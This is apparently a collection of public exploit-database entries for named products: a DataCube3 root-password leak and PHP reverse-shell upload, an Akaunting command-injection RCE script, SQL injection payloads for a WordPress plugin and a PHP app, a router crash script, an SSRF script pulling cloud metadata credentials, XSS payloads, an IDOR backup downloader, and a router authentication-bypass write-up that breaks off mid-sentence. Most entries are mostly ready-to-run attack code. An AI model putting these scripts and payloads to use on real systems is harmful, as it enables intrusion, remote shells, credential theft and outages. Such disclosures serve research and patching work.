<pre><code># Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi <br /># Publication Date: 2023-01-11<br /># Original Researcher: Xenofon Vassilakopoulos<br /># Exploit Author: Xenofon Vassilakopoulos<br /># Submitter: Xenofon Vassilakopoulos<br /># Vendor Homepage: https://wpwave.com/<br /># Version: Hide My WP v6.2.8 and prior<br /># Tested on: Hide My WP v6.2.7<br /># Impact: Database Access<br /># CVE: CVE-2022-4681<br /># CWE: CWE-89<br /># CVSS Score: 8.6 (high)<br /><br />## Description<br /><br />The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.<br /><br /><br />## Proof of Concept<br /><br />curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"<br /><br /></code></pre>
<pre><code># Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'<br /># Date: 7/28/2022<br /># Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)<br /># Vendor Homepage: https://www.f-logic.jp<br /># Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf<br /># Version: Ver1.0<br /># Tested on: DataCube3 version 1.0 (Ubuntu)<br /># CVE : CVE-2024-25830 + CVE-2024-25832<br /><br /># Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload<br /><br />from __future__ import print_function, unicode_literals<br />from bs4 import BeautifulSoup<br />import argparse<br />import requests<br />import json<br />import urllib3<br />import re<br />urllib3.disable_warnings()<br /><br />def banner():<br /> dataCube3Logo = """ <br /> ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓<br /> ▒▒▒▒▒▒▒▒██ DataCube3 Ver1.0 █F-logic▓▓<br /> ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓<br /> ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓<br /> ▒▒▒▒▒▒▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓<br /> ▒▒▒▒▒▒▒▒██ ██▓▓████▓▓<br /> ▒▒▒▒▒▒▒▒██ ██ ██ ██▓▓████▓▓<br /> ▒▒▒▒▒▒▒▒██ █████████████████ ██▓▓▓▓▓▓▓▓<br /> ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓ <br /> <br />\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mDataCube3 exploit chain reverse shell\033[1;m <br /> FOR EDUCATIONAL PURPOSE ONLY. <br /> """<br /> return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))<br /><br /><br />def extractRootPwd(RHOST, RPORT, protocol):<br /> url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)<br /> try:<br /> response = requests.get(url, allow_redirects=False, verify=False, timeout=20)<br /> if response.status_code != 302:<br /> print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')<br /> exit()<br /> soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')<br /> scriptTag = str(soup.find_all('script')[12]).replace(' ', '')<br /> rawLeakedData = re.findall('configData:.*,', scriptTag)[0]<br /> jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))<br /> adminPassword = jsonLeakedData[12]['value']<br /> rootPassword = jsonLeakedData[14]['value']<br /> print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))<br /> return rootPassword<br /> except:<br /> print('[ERROR] Can\'t grab the DataCube3 version...')<br /><br /><br />def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):<br /> print('[INFO] Generating DataCube3 auth cookie ...')<br /> url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)<br /> data = {<br /> 'user_id': 'root',<br /> 'user_pw': rootPassword,<br /> 'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'<br /> }<br /> try:<br /> response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)<br /> if response.status_code != 302:<br /> print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')<br /> exit()<br /> authCookie = response.cookies.get_dict() <br /> print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie)) <br /> return authCookie<br /> except:<br /> print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')<br /><br /><br />def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):<br /> print('[INFO] Extracting Accesstime ...')<br /> url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)<br /> try:<br /> response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)<br /> if response.status_code != 302:<br /> print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')<br /> exit()<br /> soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')<br /> accessTime = soup.find('input', {'name': 'accesstime'}).get('value')<br /> print('[INFO] AccessTime value: {}'.format(accessTime))<br /> return accessTime<br /> except:<br /> print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')<br /><br /><br />def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):<br /> print('[INFO] Injecting PHP reverse shell script ...')<br /> filename='rvs.php'<br /> payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)<br /><br /> data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��追å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)<br /><br /> headers = {<br /> 'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'<br /> }<br /> url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)<br /> try:<br /> response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)<br /> if response.status_code != 302:<br /> print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')<br /> exit()<br /> shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)<br /> print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))<br /> return shellURL<br /> except:<br /> print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')<br /><br /><br />def execReverseShell(shellURL):<br /> print('[INFO] Executing reverse shell...')<br /> try:<br /> response = requests.get(shellURL, allow_redirects=False, verify=False)<br /> print('[INFO] Reverse shell successfully executed.')<br /> return<br /> except Exception as e:<br /> print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')<br /> return False<br /><br /><br />def main():<br /> banner()<br /> args = parser.parse_args()<br /> protocol = 'https' if args.RPORT == 443 else 'http'<br /> rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)<br /> authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)<br /> accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)<br /> shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)<br /> execReverseShell(shellURL)<br /><br /><br />if __name__ == '__main__':<br /> parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)<br /> parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)<br /> parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)<br /> parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)<br /> parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)<br /> main()<br /><br /></code></pre>
<pre><code># Exploit Title: Akaunting < 3.1.3 - RCE<br /># Date: 08/02/2024<br /># Exploit Author: u32i@proton.me<br /># Vendor Homepage: https://akaunting.com<br /># Software Link: https://github.com/akaunting/akaunting<br /># Version: <= 3.1.3<br /># Tested on: Ubuntu (22.04)<br /># CVE : CVE-2024-22836<br /><br />#!/usr/bin/python3<br /><br />import sys<br />import re<br />import requests<br />import argparse<br /><br />def get_company():<br /> # print("[INF] Retrieving company id...")<br /> res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)<br /> if res.status_code != 302:<br /> print("[ERR] No company id was found!")<br /> sys.exit(3)<br /> cid = res.headers['Location'].split('/')[-1]<br /> if cid == "login":<br /> print("[ERR] Invalid session cookie!")<br /> sys.exit(7)<br /> return cid<br /><br />def get_tokens(url):<br /> res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)<br /> search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)<br /><br /> if not search_res:<br /> print("[ERR] Couldn't get csrf token")<br /> sys.exit(1)<br /><br /> data = {}<br /> data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')<br /> data['session'] = res.cookies.get('akaunting_session')<br /> return data<br /><br />def inject_command(cmd):<br /> url = f"{target}/{company_id}/wizard/companies"<br /> tokens = get_tokens(url)<br /> headers.update({"X-Csrf-Token": tokens['csrf_token']})<br /> data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}<br /> res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)<br /> if res.status_code == 200:<br /> res_data = res.json()<br /> if res_data['error']:<br /> print("[ERR] Command injection failed!")<br /> sys.exit(4)<br /> print("[INF] Command injected!")<br /><br /><br />def trigger_rce(app, version = "1.0.0"):<br /> print("[INF] Executing the command...")<br /> url = f"{target}/{company_id}/apps/install"<br /> data = {"alias": app, "version": version, "path": f"apps/{app}/download"}<br /> headers.update({"Content-Type":"application/json"})<br /> res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)<br /> if res.status_code == 200:<br /> res_data = res.json()<br /> if res_data['error']:<br /> search_res = re.search(r">Exit Code\:.*<", res_data['message'])<br /> if search_res:<br /> print("[ERR] Failed to execute the command")<br /> sys.exit(6)<br /> print("[ERR] Failed to install the app! no command was executed!")<br /> sys.exit(5)<br /> print("[INF] Executed successfully!")<br /><br />def login(email, password):<br /> url = f"{target}/auth/login"<br /> tokens = get_tokens(url)<br /><br /> cookies.update({<br /> 'akaunting_session': tokens['session']<br /> })<br /><br /> data = {<br /> "_token": tokens['csrf_token'],<br /> "_method": "POST",<br /> "email": email,<br /> "password": password<br /> }<br /> <br /> req = requests.post(url, headers=headers, cookies=cookies, data=data)<br /> res = req.json()<br /> if res['error']:<br /> print("[ERR] Failed to log in!")<br /> sys.exit(8)<br /><br /> print("[INF] Logged in")<br /> cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})<br /> <br />def main():<br /> inject_command(args.command)<br /> trigger_rce(args.alias, args.version)<br /><br />if __name__=='__main__':<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument("-u", "--url", help="target url")<br /> parser.add_argument("--email", help="user login email.")<br /> parser.add_argument("--password", help="user login password.")<br /> parser.add_argument("-i", "--id", type=int, help="company id (optional).")<br /> parser.add_argument("-c", "--command", help="command to execute.")<br /> parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")<br /> parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")<br /><br /> args = parser.parse_args()<br /> <br /> headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}<br /> cookies = {}<br /> target = args.url<br /><br /> try:<br /> login(args.email, args.password)<br /> company_id = get_company() if not args.id else args.id<br /> main()<br /> except:<br /> sys.exit(0)<br /><br /></code></pre>
<pre><code>#!/usr/bin/python3<br />#<br /># Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability <br /># CVE: CVE-2023-5808<br /># Date: 2023-12-13<br /># Exploit Author: Arslan Masood (@arszilla)<br /># Vendor: https://www.hitachivantara.com/<br /># Version: < 14.8.7825.01<br /># Tested On: 13.9.7021.04 <br /><br />import argparse<br />from datetime import datetime<br />from os import getcwd<br /><br />import requests<br /><br />parser = argparse.ArgumentParser(<br /> description="CVE-2023-5808 PoC",<br /> usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"<br /> )<br /><br /># Create --host argument:<br />parser.add_argument(<br /> "--host",<br /> required=True,<br /> type=str,<br /> help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"<br /> )<br /><br /># Create --id argument:<br />parser.add_argument(<br /> "--id",<br /> required=True,<br /> type=str,<br /> help="JSESSIONID cookie value"<br /> )<br /><br /># Create --sso argument:<br />parser.add_argument(<br /> "--sso",<br /> required=True,<br /> type=str,<br /> help="JSESSIONIDSSO cookie value"<br /> )<br /><br />args = parser.parse_args()<br /><br />def download_file(hostname, jsessionid, jsessionidsso):<br /> # Set the filename:<br /> filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"<br /><br /> # Vulnerable SMU URL:<br /> smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"<br /><br /> # GET request cookies<br /> smu_cookies = {<br /> "JSESSIONID": jsessionid,<br /> "JSESSIONIDSSO": jsessionidsso<br /> }<br /><br /> # GET request headers:<br /> smu_headers = {<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",<br /> "Accept-Language": "en-US,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Dnt": "1",<br /> "Referer": f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",<br /> "Upgrade-Insecure-Requests": "1",<br /> "Sec-Fetch-Dest": "document",<br /> "Sec-Fetch-Mode": "navigate",<br /> "Sec-Fetch-Site": "same-origin",<br /> "Sec-Fetch-User": "?1",<br /> "Te": "trailers",<br /> "Connection": "close"<br /> }<br /><br /> # Send the request:<br /> with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:<br /> with open(filename, 'wb') as backup_archive:<br /> # Write the zip file to the CWD:<br /> backup_archive.write(file_download.content)<br /><br /> print(f"{filename} has been downloaded to {getcwd()}")<br /><br />if __name__ == "__main__":<br /> download_file(args.host, args.id, args.sso)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'<br /># Date: 8/12/2023<br /># Exploit Author: Anish Feroz (ZEROXINN)<br /># Vendor Homepage: http://www.tp-link.com<br /># Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n<br /># Tested on: TP-Link TL-WR740N<br /><br />#Description:<br /><br />#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.<br /><br />#Usage:<br /><br />#python3 target username password<br />#change port, if required<br /><br />------------------------------------------------POC-----------------------------------------<br /><br />#!/usr/bin/python<br /><br />import requests<br />from requests.auth import HTTPBasicAuth<br />import base64<br /><br />def send_request(ip, username, password):<br /> auth_url = f"http://{ip}:8082"<br /> target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"<br /><br /> credentials = f"{username}:{password}"<br /> encoded_credentials = base64.b64encode(credentials.encode()).decode()<br /><br /> headers = {<br /> "Host": f"{ip}:8082",<br /> "Authorization": f"Basic {encoded_credentials}",<br /> "Upgrade-Insecure-Requests": "1",<br /> "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",<br /> "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Accept-Language": "en-US,en;q=0.9",<br /> "Connection": "close"<br /> }<br /><br /> session = requests.Session()<br /> <br /> response = session.get(target_url, headers=headers)<br /><br /> if response.status_code == 200:<br /> print("Server Crashed")<br /> print(response.text)<br /> else:<br /> print(f"Script Completed with status code {response.status_code}")<br /><br />ip_address = input("Enter IP address of the host: ")<br />username = input("Enter username: ")<br />password = input("Enter password: ")<br /><br />send_request(ip_address, username, password)<br /><br /></code></pre>
<pre><code>Title: MongoDB MONGOSH Password Exposure Vulnerability<br />Product: MongoDB database<br />Tool: mongosh<br />Affected Version(s): 2.0.1 , 2.1.1,2.1.4,2.1.5<br />Tested Version(s): 2.0.1 , 2.1.1,2.1.4,2.1.5<br />Risk Level: Low<br />Author of Advisory: Emad Al-Mousa<br /><br /><br />*****************************************<br />Vulnerability Details:<br /><br />Vulnerability in MongoDB database system "mongosh" which is a JavaScript and Node.js REPL environment for interacting with MongoDB deployments in Atlas , locally, or on another remote host. So, its basically a command line utility to run database commands and java scripts against back-end MongoDB database system.<br /><br />MONGOSH has two vulnerbailites where passwords can be exposed and leaked in which an attacker to the operating system can weaponize for unauthorized access to the MongoDB database system.<br /><br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />Vulnerability No1. : passwordPrompt() showing password displayed in clear text<br /><br />per documentation:<br /><br />https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompt<br /><br />The password should not be displayed, however I found out that it appears clearly in the prompt !<br /><br />The password function passwordPrompt() was tested and used in conjunction with db.createUser, db.changeUserPassword, db.auth commands and all of them were allowing clear text password to appear.<br /><br /><br /><br /><br />admin> use admin<br />already on db admin<br />admin> db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})<br />Enter password<br />mongo<br />*****{ ok: 1 }<br />admin><br /><br /><br />Vulnerability No2. : Password is exposed in mongosh_repl_history file with db.auth command<br /><br /><br />Mongosh was tested with both “remove”& “remove-redact” modes<br /><br />config.set (redactHistory, “remove-redact”)<br /><br />config.set (‘redactHistory’, “remove”)<br /><br />In Linux Red Hat Environment the file: $MONGOHOME/.mongodb/mongosh/mongosh_repl_history<br /><br />Contains the password in clear text for historical commands run for authentication db.auth() and db.createUser , per documentation: https://www.mongodb.com/docs/mongodb-shell/logs/ the logs should omit the credentials but this didn’t happen !<br /><br />In windows operating system environment the file: C:\Users\windows_profile_user\AppData\Roaming\mongodb\mongosh<br /><br />Commands running for database creation db.createUser and db.auth() are logging the username, password explicitly as shown below:<br /><br />cat mongosh_repl_history<br /><br />use admin<br /><br />db.createUser({user:"mongo2", pwd: passwordPrompt(), roles:["root"]})<br /><br /><br />*****************************************<br />References:<br />https://databasesecurityninja.wordpress.com/2024/03/07/mongodb-mongosh-password-exposure-vulnerability/<br />https://www.mongodb.com/docs/manual/reference/method/passwordPrompt/#mongodb-method-passwordPrompt<br />https://www.mongodb.com/docs/mongodb-shell/logs/<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Ladder v0.0.21 Server-side request forgery (SSRF)<br /># Date: 2024-01-20<br /># Exploit Author: @_chebuya<br /># Software Link: https://github.com/everywall/ladder<br /># Version: v0.0.1 - v0.0.21<br /># Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)<br /># CVE: CVE-2024-27620<br /># Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs<br />import requests<br />import json<br /><br />target_url = "http://127.0.0.1:8080/api/"<br />imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"<br /><br />r = requests.get(target_url + imdsv1_url)<br />response_json = json.loads(r.text)<br />print(response_json["body"])<br /></code></pre>
<pre><code># Exploit Title: FullCourt enterprise XSS<br /># Date: 2023-28-12<br /># Exploit Author: Omar Sabagh<br /># Author Linkedin: https://www.linkedin.com/in/omar-s-b937791a2/<br /># Vendor Homepage: https://www.justicesystems.com<br /># Software Link: https://www.justicesystems.com/products/fullcourt-enterprise/<br /># Version: FullCourt enterprise - V8.2<br /># CVE : CVE-2024-25327<br /><br /># Summary: <br />During a penetration test conducted in December of 2023, It was discovered that the full court enterprise web application was susceptible to reflected (obfuscated and unobfuscated) XSS attacks which could be injected in multiple parameters. This allows an attacker to redirect victims, create pop ups and load external resources (such as externally hosted images). <br /><br /># POC: <br /><br />XSS example 1.)<br /><br />GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000b9wsx%3cscript%3ealert(1)%3c%2fscript%3ec5yblw44633&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.criminalJuvenileCaseDomesticViolenceIndicator=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.juryVerdict=&courtCaseBean.citationImportCase=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1<br /><br />--The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload b9wsx<script>alert(1)</script>c5yblw44633 was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application's response.<br /><br />--This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.<br /><br />--The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.<br /><br />XSS example 2.)<br /><br />GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000vymvd%d3cscript%3ealert(1)%3c%2fscript%3erkoqwks4vtrfy0vi%3cscript%3ealert(1)%3c%2fscript%3egonoz&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1<br /><br />--The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload fy0vi<script>alert(1)</script>gonoz was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application's response.<br /><br />XSS example 3.)<br /><br />--Unobfuscated direct URL injection<br />https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C<script>alert('Bob--you owe 500 dollars,click here to resolve')</script>%3Ex5zbiql8jrw&citationNumber=12345&searchAction=<br /><br />--Obfuscated direct URL injection:<br />https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C%73cr%69pt%3E%61ler%74(%27%4F%77ned%20%62y%20%4Fm%61r%27)%3C%2f%73cr%69pt%3Ex5zbiql8jrw&citationNumber=53267&searchAction=<br /><br />--For both examples, The value of the r request parameter is copied into the HTML document as plain text between tags. The payloads were submitted in the r parameter. This input was echoed unmodified in the application's response.<br /></code></pre>
<pre><code>## Title: NDtaskmatic-1.0-by-Mayuri.K Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 03/07/2024<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />Potential SQLi detected. Please manually confirm it after you check<br />manually the POST, GET, or other requests...<br />The payload from the puncher_SQLi_bypass_authentication module was<br />submitted successfully after the test.<br />The task_id is vulnerable to SQLi attacks, the attacker can get all<br />information from the system by using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: task_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: task_id=39' AND (SELECT 8670 FROM(SELECT<br />COUNT(*),CONCAT(0x7176767871,(SELECT<br />(ELT(8670=8670,1))),0x717a717a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# FrpM<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: task_id=39';SELECT SLEEP(7)#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: task_id=39' AND (SELECT 9072 FROM (SELECT(SLEEP(7)))RtEq)# XSsn<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/NDtaskmatic-1.0-by-Mayuri.K)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/ndtaskmatic-10-by-mayurik-multiple-sqli.html)<br /><br />## Time spend:<br />00:35:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and<br />https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>DZONERZY Security Research<br /><br />GLiNet: Router Authentication Bypass<br /><br />========================================================================<br />Contents<br />========================================================================<br /><br />1. Overview<br />2. Detailed Description<br />3. Exploit<br />4. Timeline<br /><br />========================================================================<br />1. Overview<br />========================================================================<br /><br />CVE-2023-46453 is a remote authentication bypass vulnerability in the web<br />interface of GLiNet routers running firmware versions 4.x and up. The<br />vulnerability allows an attacker to bypass authentication and gain access<br />to the router's web interface.<br /><br />========================================================================<br />2. Detailed Description<br />========================================================================<br /><br />The vulnerability is caused by a lack of proper authentication checks in<br />/usr/sbin/gl-ngx-session file. The file is responsible for authenticating<br />users to the web interface. The authentication is in different stages.<br /><br />Stage 1:<br /><br />During the first stage the user send a request to the challenge rcp<br />endpoint. The endpoint returns a random nonce value used later in the<br />authentication process.<br /><br />Stage 2:<br /><br />During the second stage the user sends a request to the login rcp endpoint<br />with the username and the encrypted password. The encrypted password is<br />calculated by the following formula:<br /><br />md5(username + crypt(password) + nonce)<br /><br />The crypt function is the standard unix crypt function.<br /><br />The vulnerability lies in the fact that the username is not sanitized<br />properly before being passed to the login_test function in the lua script.<br /><br />------------------------------------------------------------------------<br />local function login_test(username, hash)<br /> if not username or username == "" then return false end<br /><br /> for l in io.lines("/etc/shadow") do<br /> local pw = l:match('^' .. username .. ':([^:]+)')<br /> if pw then<br /> for nonce in pairs(nonces) do<br /> if utils.md5(table.concat({username, pw, nonce}, ":")) ==<br />hash then<br /> nonces[nonce] = nil<br /> nonce_cnt = nonce_cnt - 1<br /> return true<br /> end<br /> end<br /> return false<br /> end<br /> end<br /><br /> return false<br />end<br />------------------------------------------------------------------------<br /><br />This script check the username against the /etc/shadow file. If the username<br />is found in the file the script will extract the password hash and compare<br />it to the hash sent by the user. If the hashes match the user is<br />authenticated.<br /><br />The issue is that the username is not sanitized properly before being<br />concatenated with the regex. This allows an attacker to inject a regex into<br />the username field and modify the final behavior of the regex.<br /><br />for instance, the following username will match the userid of the root user:<br /><br />root:[^:]+:[^:]+ will become root:[^:]+:[^:]+:([^:]+)<br /><br /><br />This will match the "root:" string and then any character until the next ":"<br />character. This will cause the script skip the password and return the<br />user id instead.<br /><br />Since the user id of the root user is always 0, the script will always<br />return:<br /><br />md5("root:[^:]+:[^:]+" + "0" + nonce)<br /><br />Since this value is always the same, the attacker can simply send the known<br />hash value to the login rcp endpoint and gain access to the web interface.<br /><br />Anyway this approach won't work as expected since later in the code inside<br />the<br />this check appear:<br /><br />------------------------------------------------------------------------<br /> local aclgroup = db.get_acl_by_username(username)<br /><br /> local sid = utils.generate_id(32)<br /><br /> sessions[sid] = {<br /> username = username,<br /> aclgroup = aclgroup,<br /> timeout = time_now() + session_timeout<br /> }<br />------------------------------------------------------------------------<br /><br />The username which is now our custom regex will be passed to the<br />get_acl_by_username<br />function. This function will check the username against a database and<br />return the aclgroup associated with the username.<br />If the username is not found in the database the function will return 